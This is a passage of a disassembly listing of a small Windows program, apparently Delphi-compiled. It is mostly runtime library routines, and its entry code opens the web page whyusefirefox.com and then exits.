loc_402C7C: ; CODE XREF: sub_402C44+34�j
cmp esi, ebx
jg short loc_402C6C
loc_402C80: ; CODE XREF: sub_402C44+26�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_402C9E
; ---------------------------------------------------------------------------
loc_402C8A: ; DATA XREF: sub_402C44+19�o
jmp loc_40285C
; ---------------------------------------------------------------------------
call sub_402BE4
call sub_4029C0
call sub_402A14
loc_402C9E: ; CODE XREF: sub_402C44+D�j
; sub_402C44+44�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_402C44 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402CA4 proc near ; CODE XREF: sub_4032C8+3A�p
mov ds:off_405010, offset sub_401008
mov ds:off_405014, offset sub_401010
mov ds:off_405628, eax
xor eax, eax
mov ds:dword_40562C, eax
mov ds:off_405630, edx
mov eax, [edx+4]
mov ds:dword_40501C, eax
call sub_402B9C
mov ds:byte_405024, 0
call sub_402C44
retn
sub_402CA4 endp
; =============== S U B R O U T I N E =======================================
sub_402CE4 proc near ; CODE XREF: sub_402DFC+38�p
push ebx
push esi
push edi
mov esi, offset aRuntimeErrorAt ; "Runtime error at 00000000"
mov cl, 10h
mov ebx, ds:dword_404000
loc_402CF4: ; CODE XREF: sub_402CE4+33�j
mov eax, ebx
mov edi, 0Ah
cdq
idiv edi
add dl, 30h
xor eax, eax
mov al, cl
mov [esi+eax], dl
mov eax, ebx
mov ebx, 0Ah
cdq
idiv ebx
mov ebx, eax
dec ecx
test ebx, ebx
jnz short loc_402CF4
mov cl, 1Ch
mov eax, ds:dword_404004
loc_402D20: ; CODE XREF: sub_402CE4+54�j
mov edx, eax
and edx, 0Fh
mov dl, ds:byte_404074[edx]
xor ebx, ebx
mov bl, cl
mov [esi+ebx], dl
shr eax, 4
dec ecx
test eax, eax
jnz short loc_402D20
pop edi
pop esi
pop ebx
retn
sub_402CE4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402D40 proc near ; CODE XREF: sub_402DFC+9E�p
xor eax, eax
xchg eax, ds:dword_404000
neg eax
sbb eax, eax
inc eax
mov edi, offset dword_405620
mov ebx, [edi+18h]
mov ebp, [edi+14h]
push dword ptr [edi+1Ch]
push dword ptr [edi+20h]
mov esi, [edi]
mov ecx, 0Bh
rep movsd
pop edi
pop esi
leave
retn 0Ch
sub_402D40 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402D70 proc near ; CODE XREF: sub_402DFC+3D�p
var_4 = byte ptr -4
push ecx
cmp ds:byte_405034, 0
jz short loc_402DD1
cmp ds:word_405208, 0D7B2h
jnz short loc_402D99
cmp ds:dword_405210, 0
jbe short loc_402D99
mov eax, offset dword_405204
call ds:dword_405220
loc_402D99: ; CODE XREF: sub_402D70+13�j
; sub_402D70+1C�j
push 0
lea eax, [esp+8+var_4]
push eax
push 1Eh
push offset aRuntimeErrorAt ; "Runtime error at 00000000"
push 0FFFFFFF5h
call sub_401000 ; GetStdHandle
push eax
call sub_401020 ; WriteFile
push 0
lea eax, [esp+8+var_4]
push eax
push 2
push offset dword_402DF8
push 0FFFFFFF5h
call sub_401000 ; GetStdHandle
push eax
call sub_401020 ; WriteFile
pop edx
retn
; ---------------------------------------------------------------------------
loc_402DD1: ; CODE XREF: sub_402D70+8�j
cmp ds:byte_404018, 0
jnz short loc_402DED
push 0
push offset aError ; "Error"
push offset aRuntimeErrorAt ; "Runtime error at 00000000"
push 0
call sub_401030 ; MessageBoxA
loc_402DED: ; CODE XREF: sub_402D70+68�j
pop edx
retn
sub_402D70 endp
; ---------------------------------------------------------------------------
align 10h
dd 0FFFFFFFFh, 2
dword_402DF8 dd 0A0Dh ; DATA XREF: sub_402D70+4D�o
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_402DFC proc near ; CODE XREF: sub_402ED4+5�p
; CODE:004034BB�p
push ebx
push esi
push edi
push ebp
mov ebx, offset dword_405620
mov esi, offset dword_404000
mov edi, offset dword_405030
cmp byte ptr [ebx+28h], 0
jnz short loc_402E2B
cmp dword ptr [edi], 0
jz short loc_402E2B
loc_402E1A: ; CODE XREF: sub_402DFC+2D�j
mov edx, [edi]
mov eax, edx
xor edx, edx
mov [edi], edx
mov ebp, eax
call ebp
cmp dword ptr [edi], 0
jnz short loc_402E1A
loc_402E2B: ; CODE XREF: sub_402DFC+17�j
; sub_402DFC+1C�j
cmp ds:dword_404004, 0
jz short loc_402E45
call sub_402CE4
call sub_402D70
xor eax, eax
mov ds:dword_404004, eax
loc_402E45: ; CODE XREF: sub_402DFC+36�j
; sub_402DFC+CE�j
cmp byte ptr [ebx+28h], 2
jnz short loc_402E55
cmp dword ptr [esi], 0
jnz short loc_402E55
xor eax, eax
mov [ebx+0Ch], eax
loc_402E55: ; CODE XREF: sub_402DFC+4D�j
; sub_402DFC+52�j
call sub_402BE4
cmp byte ptr [ebx+28h], 1
jbe short loc_402E65
cmp dword ptr [esi], 0
jz short loc_402E86
loc_402E65: ; CODE XREF: sub_402DFC+62�j
mov eax, [ebx+10h]
test eax, eax
jz short loc_402E86
call sub_402FF8
mov edx, [ebx+10h]
mov eax, [edx+10h]
cmp eax, [edx+4]
jz short loc_402E86
test eax, eax
jz short loc_402E86
push eax
call sub_401038 ; FreeLibrary
loc_402E86: ; CODE XREF: sub_402DFC+67�j
; sub_402DFC+6E�j ...
call sub_402BBC
cmp byte ptr [ebx+28h], 1
jnz short loc_402E94
call dword ptr [ebx+24h]
loc_402E94: ; CODE XREF: sub_402DFC+93�j
cmp byte ptr [ebx+28h], 0
jz short loc_402E9F
call sub_402D40
loc_402E9F: ; CODE XREF: sub_402DFC+9C�j
cmp dword ptr [ebx], 0
jnz short loc_402EBB
cmp ds:dword_405018, 0
jz short loc_402EB3
call ds:dword_405018
loc_402EB3: ; CODE XREF: sub_402DFC+AF�j
mov eax, [esi]
push eax
call sub_401028 ; ExitProcess
loc_402EBB: ; CODE XREF: sub_402DFC+A6�j
mov eax, [ebx]
push esi
mov esi, eax
mov edi, ebx
mov ecx, 0Bh
rep movsd
pop esi
jmp loc_402E45
sub_402DFC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
pop ebp
pop edi
pop esi
pop ebx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_402ED4 proc near ; CODE XREF: sub_402478+6�p
; sub_402EE0+6�j
mov ds:dword_404000, eax
call sub_402DFC
sub_402ED4 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_402EE0 proc near ; CODE XREF: CODE:00402B91�j
; sub_403238+1A�p ...
pop ds:dword_404004
jmp sub_402ED4
sub_402EE0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_402EEC proc near ; CODE XREF: sub_402F3C+23�p
; sub_403068+60�p
mov edx, [eax]
test edx, edx
jz short locret_402F0E
mov dword ptr [eax], 0
mov ecx, [edx-8]
dec ecx
jl short locret_402F0E
lock dec dword ptr [edx-8]
jnz short locret_402F0E
push eax
lea eax, [edx-8]
call sub_402458
pop eax
locret_402F0E: ; CODE XREF: sub_402EEC+4�j
; sub_402EEC+10�j ...
retn
sub_402EEC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402F10 proc near ; CODE XREF: sub_402F3C+B�p
test eax, eax
jle short loc_402F38
push eax
add eax, 0Ah
and eax, 0FFFFFFFEh
push eax
call sub_402438
pop edx
mov word ptr [edx+eax-2], 0
add eax, 8
pop edx
mov [eax-4], edx
mov dword ptr [eax-8], 1
retn
; ---------------------------------------------------------------------------
loc_402F38: ; CODE XREF: sub_402F10+2�j
xor eax, eax
retn
sub_402F10 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402F3C proc near ; CODE XREF: sub_402F6C+12�j
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, ecx
mov eax, edi
call sub_402F10
mov ecx, edi
mov edi, eax
test esi, esi
jz short loc_402F5D
mov edx, eax
mov eax, esi
call sub_4024EC
loc_402F5D: ; CODE XREF: sub_402F3C+16�j
mov eax, ebx
call sub_402EEC
mov [ebx], edi
pop edi
pop esi
pop ebx
retn
sub_402F3C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402F6C proc near ; CODE XREF: sub_403068+36�p
push edi
push eax
push ecx
mov edi, edx
xor eax, eax
repne scasb
jnz short loc_402F79
not ecx
loc_402F79: ; CODE XREF: sub_402F6C+9�j
pop eax
add ecx, eax
pop eax
pop edi
jmp sub_402F3C
sub_402F6C endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_402F84 proc near ; DATA XREF: CODE:0040315F�o
; BSS:off_405000�o
mov al, 11h
jmp sub_4024D0
sub_402F84 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402F8C proc near ; CODE XREF: sub_402FF8+1B�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov [ebp+var_4], eax
mov eax, ds:dword_404020
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_402FDF
loc_402FA6: ; CODE XREF: sub_402F8C+51�j
xor eax, eax
push ebp
push offset loc_402FC7
push dword ptr fs:[eax]
mov fs:[eax], esp
mov ebx, [ebp+var_8]
mov eax, [ebp+var_4]
call dword ptr [ebx+4]
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_402FD1
; ---------------------------------------------------------------------------
loc_402FC7: ; DATA XREF: sub_402F8C+1D�o
jmp loc_40285C
; ---------------------------------------------------------------------------
call sub_402A14
loc_402FD1: ; CODE XREF: sub_402F8C+39�j
mov eax, [ebp+var_8]
mov eax, [eax]
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_402FA6
loc_402FDF: ; CODE XREF: sub_402F8C+18�j
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_402F8C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402FE8 proc near ; CODE XREF: sub_4032BC+5�p
mov edx, ds:dword_40401C
mov [eax], edx
mov ds:dword_40401C, eax
retn
sub_402FE8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402FF8 proc near ; CODE XREF: sub_402DFC+70�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], eax
xor edx, edx
push ebp
push offset loc_40305C
push dword ptr fs:[edx]
mov fs:[edx], esp
mov eax, [ebp+var_4]
mov eax, [eax+4]
call sub_402F8C
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403063
loc_403025: ; CODE XREF: sub_402FF8+69�j
mov eax, [ebp+var_4]
cmp eax, ds:dword_40401C
jnz short loc_40303C
mov eax, [ebp+var_4]
mov eax, [eax]
mov ds:dword_40401C, eax
jmp short loc_40305B
; ---------------------------------------------------------------------------
loc_40303C: ; CODE XREF: sub_402FF8+36�j
mov eax, ds:dword_40401C
test eax, eax
jz short loc_40305B
loc_403045: ; CODE XREF: sub_402FF8+61�j
mov edx, [eax]
cmp edx, [ebp+var_4]
jnz short loc_403055
mov edx, [ebp+var_4]
mov edx, [edx]
mov [eax], edx
jmp short loc_40305B
; ---------------------------------------------------------------------------
loc_403055: ; CODE XREF: sub_402FF8+52�j
mov eax, [eax]
test eax, eax
jnz short loc_403045
loc_40305B: ; CODE XREF: sub_402FF8+42�j
; sub_402FF8+4B�j ...
retn
; ---------------------------------------------------------------------------
loc_40305C: ; DATA XREF: sub_402FF8+A�o
jmp loc_402988
; ---------------------------------------------------------------------------
jmp short loc_403025
; ---------------------------------------------------------------------------
loc_403063: ; CODE XREF: sub_402FF8:loc_40305B�j
; DATA XREF: sub_402FF8+28�o
pop ecx
pop ebp
retn
sub_402FF8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403068 proc near ; CODE XREF: CODE:004031DD�p
; CODE:004031EE�p
var_10 = dword ptr -10h
var_B = byte ptr -0Bh
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push ebx
xor edx, edx
mov [ebp+var_10], edx
xor edx, edx
push ebp
push offset loc_4030CE
push dword ptr fs:[edx]
mov fs:[edx], esp
push 7
lea edx, [ebp+var_B]
push edx
push 1004h
push eax
call sub_401048 ; GetLocaleInfoA
lea eax, [ebp+var_10]
lea edx, [ebp+var_B]
mov ecx, 7
call sub_402F6C
mov eax, [ebp+var_10]
lea edx, [ebp+var_4]
call sub_402584
mov ebx, eax
cmp [ebp+var_4], 0
jz short loc_4030B8
xor ebx, ebx
loc_4030B8: ; CODE XREF: sub_403068+4C�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4030D5
loc_4030C5: ; CODE XREF: sub_403068+6B�j
lea eax, [ebp+var_10]
call sub_402EEC
retn
; ---------------------------------------------------------------------------
loc_4030CE: ; DATA XREF: sub_403068+F�o
jmp loc_402988
; ---------------------------------------------------------------------------
jmp short loc_4030C5
; ---------------------------------------------------------------------------
loc_4030D5: ; CODE XREF: sub_403068+65�j
; DATA XREF: sub_403068+58�o
mov eax, ebx
pop ebx
mov esp, ebp
pop ebp
retn
sub_403068 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403126
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4055A4
jnz short loc_403118
mov eax, offset dword_405038
call sub_40252C
mov eax, offset dword_405204
call sub_40252C
mov eax, offset dword_4053D0
call sub_40252C
call sub_40183C
loc_403118: ; CODE XREF: CODE:004030F3�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40312D
loc_403125: ; CODE XREF: CODE:0040312B�j
retn
; ---------------------------------------------------------------------------
loc_403126: ; DATA XREF: CODE:004030E2�o
jmp loc_402988
; ---------------------------------------------------------------------------
jmp short loc_403125
; ---------------------------------------------------------------------------
loc_40312D: ; CODE XREF: CODE:loc_403125�j
; DATA XREF: CODE:00403120�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
sub ds:dword_4055A4, 1
jnb locret_403202
mov ds:byte_404008, 2
mov ds:off_405010, offset sub_401008
mov ds:off_405014, offset sub_401010
mov ds:byte_405036, 2
mov ds:off_405000, offset sub_402F84
call sub_402660
test al, al
jz short loc_403177
call sub_402690
loc_403177: ; CODE XREF: CODE:00403170�j
call sub_402754
mov ds:word_40503C, 0D7B0h
mov ds:word_405208, 0D7B0h
mov ds:word_4053D4, 0D7B0h
call sub_401040 ; GetCommandLineA
mov ds:dword_40502C, eax
call sub_401088
mov ds:dword_405028, eax
call sub_401080 ; GetVersion
and eax, 80000000h
cmp eax, 80000000h
jz short loc_4031E9
call sub_401080 ; GetVersion
and eax, 0FFh
cmp ax, 4
jbe short loc_4031D8
mov ds:dword_4055A8, 3
jmp short loc_4031F8
; ---------------------------------------------------------------------------
loc_4031D8: ; CODE XREF: CODE:004031CA�j
call sub_401058 ; GetThreadLocale
call sub_403068
mov ds:dword_4055A8, eax
jmp short loc_4031F8
; ---------------------------------------------------------------------------
loc_4031E9: ; CODE XREF: CODE:004031BA�j
call sub_401058 ; GetThreadLocale
call sub_403068
mov ds:dword_4055A8, eax
loc_4031F8: ; CODE XREF: CODE:004031D6�j
; CODE:004031E7�j
call sub_401078 ; GetCurrentThreadId
mov ds:dword_405020, eax
locret_403202: ; CODE XREF: CODE:00403137�j
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403204 proc near ; CODE XREF: sub_4032C8+C�p
jmp ds:dword_4060F8
sub_403204 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40320C proc near ; CODE XREF: sub_403224+3�p
jmp ds:dword_4060F4
sub_40320C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403214 proc near ; CODE XREF: sub_40327C+25�p
; sub_40327C+36�p
jmp ds:dword_4060F0
sub_403214 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40321C proc near ; CODE XREF: sub_403238+3D�p
jmp ds:dword_4060EC
sub_40321C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403224 proc near ; CODE XREF: sub_403238+21�p
push eax
push 40h
call sub_40320C ; LocalAlloc
retn
sub_403224 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403230 proc near ; CODE XREF: sub_403238+1�p
mov eax, 8
retn
sub_403230 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403238 proc near ; CODE XREF: sub_40327C:loc_403296�p
push ebx
call sub_403230
mov ebx, eax
test ebx, ebx
jz short loc_40327A
cmp ds:TlsIndex, 0FFFFFFFFh
jnz short loc_403257
mov eax, 0E2h
call sub_402EE0
; ---------------------------------------------------------------------------
loc_403257: ; CODE XREF: sub_403238+13�j
mov eax, ebx
call sub_403224
test eax, eax
jnz short loc_40326E
mov eax, 0E2h
call sub_402EE0
; ---------------------------------------------------------------------------
jmp short loc_40327A
; ---------------------------------------------------------------------------
loc_40326E: ; CODE XREF: sub_403238+28�j
push eax
mov eax, ds:TlsIndex
push eax
call sub_40321C ; TlsSetValue
loc_40327A: ; CODE XREF: sub_403238+A�j
; sub_403238+34�j
pop ebx
retn
sub_403238 endp
; =============== S U B R O U T I N E =======================================
sub_40327C proc near ; CODE XREF: sub_402484+20�p
; sub_4024DC+3�p ...
mov cl, ds:byte_40564C
mov eax, ds:TlsIndex
test cl, cl
jnz short loc_4032B1
mov edx, large fs:2Ch
mov eax, [edx+eax*4]
retn
; ---------------------------------------------------------------------------
loc_403296: ; CODE XREF: sub_40327C+3D�j
call sub_403238
mov eax, ds:TlsIndex
push eax
call sub_403214 ; TlsGetValue
test eax, eax
jz short loc_4032AB
retn
; ---------------------------------------------------------------------------
loc_4032AB: ; CODE XREF: sub_40327C+2C�j
mov eax, ds:dword_405658
retn
; ---------------------------------------------------------------------------
loc_4032B1: ; CODE XREF: sub_40327C+D�j
push eax
call sub_403214 ; TlsGetValue
test eax, eax
jz short loc_403296
retn
sub_40327C endp
; =============== S U B R O U T I N E =======================================
sub_4032BC proc near ; CODE XREF: sub_4032C8+2E�p
mov eax, offset dword_404088
call sub_402FE8
retn
sub_4032BC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4032C8 proc near ; CODE XREF: CODE:0040349F�p
push ebx
mov ebx, eax
xor eax, eax
mov ds:TlsIndex, eax
push 0
call sub_403204 ; GetModuleHandleA
mov ds:dword_405650, eax
mov eax, ds:dword_405650
mov ds:dword_40408C, eax
xor eax, eax
mov ds:dword_404090, eax
xor eax, eax
mov ds:dword_404094, eax
call sub_4032BC
mov edx, offset dword_404088
mov eax, ebx
call sub_402CA4
pop ebx
retn
sub_4032C8 endp
; ---------------------------------------------------------------------------
align 4
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403331
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_405654
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403338
loc_403330: ; CODE XREF: CODE:00403336�j
retn
; ---------------------------------------------------------------------------
loc_403331: ; DATA XREF: CODE:00403312�o
jmp loc_402988
; ---------------------------------------------------------------------------
jmp short loc_403330
; ---------------------------------------------------------------------------
loc_403338: ; CODE XREF: CODE:loc_403330�j
; DATA XREF: CODE:0040332B�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
sub ds:dword_405654, 1
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403369
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_40565C
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403370
loc_403368: ; CODE XREF: CODE:0040336E�j
retn
; ---------------------------------------------------------------------------
loc_403369: ; DATA XREF: CODE:0040334A�o
jmp loc_402988
; ---------------------------------------------------------------------------
jmp short loc_403368
; ---------------------------------------------------------------------------
loc_403370: ; CODE XREF: CODE:loc_403368�j
; DATA XREF: CODE:00403363�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
sub ds:dword_40565C, 1
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_4033A1
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_405660
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4033A8
loc_4033A0: ; CODE XREF: CODE:004033A6�j
retn
; ---------------------------------------------------------------------------
loc_4033A1: ; DATA XREF: CODE:00403382�o
jmp loc_402988
; ---------------------------------------------------------------------------
jmp short loc_4033A0
; ---------------------------------------------------------------------------
loc_4033A8: ; CODE XREF: CODE:loc_4033A0�j
; DATA XREF: CODE:0040339B�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
sub ds:dword_405660, 1
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_4033D9
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_405664
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4033E0
loc_4033D8: ; CODE XREF: CODE:004033DE�j
retn
; ---------------------------------------------------------------------------
loc_4033D9: ; DATA XREF: CODE:004033BA�o
jmp loc_402988
; ---------------------------------------------------------------------------
jmp short loc_4033D8
; ---------------------------------------------------------------------------
loc_4033E0: ; CODE XREF: CODE:loc_4033D8�j
; DATA XREF: CODE:004033D3�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
sub ds:dword_405664, 1
retn
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4033EC proc near ; CODE XREF: CODE:004034B6�p
jmp ds:dword_406100
sub_4033EC endp
; ---------------------------------------------------------------------------
align 4
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403419
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_405668
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403420
loc_403418: ; CODE XREF: CODE:0040341E�j
retn
; ---------------------------------------------------------------------------
loc_403419: ; DATA XREF: CODE:004033FA�o
jmp loc_402988
; ---------------------------------------------------------------------------
jmp short loc_403418
; ---------------------------------------------------------------------------
loc_403420: ; CODE XREF: CODE:loc_403418�j
; DATA XREF: CODE:00403413�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
sub ds:dword_405668, 1
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40342C proc near ; DATA XREF: CODE:00403490�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_40344B
push dword ptr fs:[eax]
mov fs:[eax], esp
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403452
loc_40344A: ; CODE XREF: sub_40342C+24�j
retn
; ---------------------------------------------------------------------------
loc_40344B: ; DATA XREF: sub_40342C+6�o
jmp loc_402988
; ---------------------------------------------------------------------------
jmp short loc_40344A
; ---------------------------------------------------------------------------
loc_403452: ; CODE XREF: sub_40342C:loc_40344A�j
; DATA XREF: sub_40342C+19�o
pop ebp
retn
sub_40342C endp
; ---------------------------------------------------------------------------
dword_403454 dd 7, 40345Ch, 40333Ch, 40330Ch, 403130h, 4030DCh, 403374h
; DATA XREF: CODE:0040349A�o
; BSS:off_405628�o
dd 403344h, 4033ACh, 40337Ch, 4033E4h, 4033B4h, 403424h
dd 4033F4h, 0
dd offset sub_40342C
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
mov eax, offset dword_403454
call sub_4032C8
push 9
push 0
push 0
push offset aHttpWww_whyuse ; "http://www.whyusefirefox.com"
push offset aOpen ; "open"
push 0
call sub_4033EC
call sub_402DFC
; ---------------------------------------------------------------------------
aHttpWww_whyuse db 'http://www.whyusefirefox.com',0 ; DATA XREF: CODE:004034AA�o
align 10h
aOpen db 'open',0 ; DATA XREF: CODE:004034AF�o
align 1000h
CODE ends
; Section 2. (virtual address 00004000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00004000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
DATA segment para public 'DATA' use32
assume cs:DATA
;org 404000h
dword_404000 dd 0 ; DATA XREF: sub_402CE4+A�r
; sub_402D40+2�w ...
dword_404004 dd 0 ; DATA XREF: sub_402478�w
; sub_402CE4+37�r ...
byte_404008 db 2 ; DATA XREF: CODE:0040313D�w
db 8Dh, 40h, 0
word_40400C dw 1332h ; DATA XREF: sub_402690+6�r
; sub_402690:loc_402708�r ...
dw 0C08Bh
byte_404010 db 0 ; DATA XREF: sub_40276C�r sub_402788�r ...
db 8Dh, 40h, 0
byte_404014 db 0 ; DATA XREF: sub_402BE4-336�r
; sub_402BE4:loc_4028E9�r
db 8Dh, 40h, 0
byte_404018 db 0 ; DATA XREF: sub_402D70:loc_402DD1�r
db 8Dh, 40h, 0
dword_40401C dd 0 ; DATA XREF: sub_402FE8�r sub_402FE8+8�w ...
dword_404020 dd 0 ; DATA XREF: sub_402F8C+C�r
off_404024 dd offset sub_401E64 ; DATA XREF: sub_402438+5�r
off_404028 dd offset sub_401FF4 ; DATA XREF: sub_402458+5�r
dd offset sub_402374
byte_404030 db 0 ; DATA XREF: sub_402484+36�r
aRsu db '',0
aFxn@ db '@',0
aError db 'Error',0 ; DATA XREF: sub_402D70+6C�o
dw 0C08Bh
aRuntimeErrorAt db 'Runtime error at 00000000',0 ; DATA XREF: sub_402CE4+3�o
; sub_402D70+32�o ...
dw 0C08Bh
byte_404074 db 30h ; DATA XREF: sub_402CE4+41�r
db 31h, 32h, 33h
dd 37363534h, 42413938h, 46454443h
TlsIndex dd 0 ; DATA XREF: sub_403238+C�r
; sub_403238+37�r ...
dword_404088 dd 0 ; DATA XREF: sub_4032BC�o
; sub_4032C8+33�o ...
dword_40408C dd 400000h ; DATA XREF: sub_4032C8+1B�w
dword_404090 dd 0 ; DATA XREF: sub_4032C8+22�w
dword_404094 dd 0 ; DATA XREF: sub_4032C8+29�w
align 1000h
DATA ends
; Section 3. (virtual address 00005000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00005000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
BSS segment para public 'DATA' use32
assume cs:BSS
;org 405000h
off_405000 dd offset sub_402F84 ; DATA XREF: CODE:0040315F�w
dword_405004 dd 0 ; DATA XREF: CODE:00402B76�r
dword_405008 dd 0 ; DATA XREF: sub_402484+9�r
; sub_402484+16�r
dword_40500C dd 0 ; DATA XREF: sub_402BE4-363�r
; CODE:00402B54�r
off_405010 dd offset sub_401008 ; DATA XREF: sub_40276C+14�r
; sub_402788+16�r ...
off_405014 dd offset sub_401010 ; DATA XREF: sub_402BE4-2B6�r
; CODE:00402B3C�r ...
dword_405018 dd 0 ; DATA XREF: sub_402DFC+A8�r
; sub_402DFC+B1�r
dword_40501C dd 400000h ; DATA XREF: sub_402CA4+29�w
dword_405020 dd 0F8h ; DATA XREF: CODE:004031FD�w
byte_405024 db 0 ; DATA XREF: sub_402CA4+33�w
align 4
dword_405028 dd 0Ah ; DATA XREF: CODE:004031A6�w
dword_40502C dd 142340h ; DATA XREF: CODE:0040319C�w
dword_405030 dd 0 ; DATA XREF: sub_402DFC+E�o
byte_405034 db 0 ; DATA XREF: sub_402D70+1�r
byte_405035 db 0 ; DATA XREF: sub_401778+1B�r
; sub_401778:loc_40181A�r ...
byte_405036 db 2 ; DATA XREF: CODE:00403158�w
align 4
dword_405038 dd 0 ; DATA XREF: sub_40252C:loc_40256B�o
; CODE:004030F5�o
word_40503C dw 0D7B0h ; DATA XREF: CODE:0040317C�w
align 10h
dd 71h dup(0)
dword_405204 dd 0 ; DATA XREF: sub_402D70+1E�o
; CODE:004030FF�o
word_405208 dw 0D7B0h ; DATA XREF: sub_402D70+A�r
; CODE:00403185�w
align 10h
dword_405210 dd 0 ; DATA XREF: sub_402D70+15�r
align 10h
dword_405220 dd 0 ; DATA XREF: sub_402D70+23�r
dd 6Bh dup(0)
dword_4053D0 dd 0 ; DATA XREF: CODE:00403109�o
word_4053D4 dw 0D7B0h ; DATA XREF: CODE:0040318E�w
align 4
dd 71h dup(0)
dword_40559C dd 0 ; DATA XREF: sub_4019E0�w
; sub_401D70+92�w ...
dword_4055A0 dd 0 ; DATA XREF: sub_4019E0+16�w
; sub_401D70+9B�w ...
dword_4055A4 dd 0 ; DATA XREF: CODE:004030ED�w
; CODE:00403130�w
dword_4055A8 dd 3 ; DATA XREF: CODE:004031CC�w
; CODE:004031E2�w ...
byte_4055AC db 0 ; DATA XREF: sub_401778+8E�w
; sub_401778:loc_401835�r ...
align 10h
